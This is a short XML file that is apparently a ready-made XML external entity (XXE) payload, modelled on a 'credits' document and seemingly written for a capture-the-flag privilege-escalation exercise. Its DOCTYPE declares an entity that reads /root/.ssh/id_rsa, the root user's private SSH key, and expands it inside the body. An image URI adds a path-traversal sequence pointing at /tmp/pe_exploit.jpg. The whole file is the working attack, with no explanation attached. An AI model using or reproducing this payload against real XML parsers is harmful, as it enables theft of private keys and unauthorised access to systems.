<?xml version="1.0" encoding="UTF-8"?>
<!-- Proudly inspired by LameCarrot (https://shakuganz.com/)-->
<!DOCTYPE credits [
   <!ELEMENT foo (#PCDATA)>
   <!ELEMENT image (uri, views, foo)>
   <!ELEMENT credits (author, image, totalviews)>
   <!ELEMENT author (#PCDATA)>
   <!ELEMENT uri (#PCDATA)>
   <!ELEMENT totalviews (#PCDATA)>
   <!ELEMENT views (#PCDATA)>
   <!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa" >
]>
<credits>
  <author>gg</author>
  <image>
    <uri>/../../../../../../tmp/pe_exploit.jpg</uri>
    <views>1</views>
    <foo>&xxe;</foo>
  </image>
  <totalviews>2</totalviews>
</credits>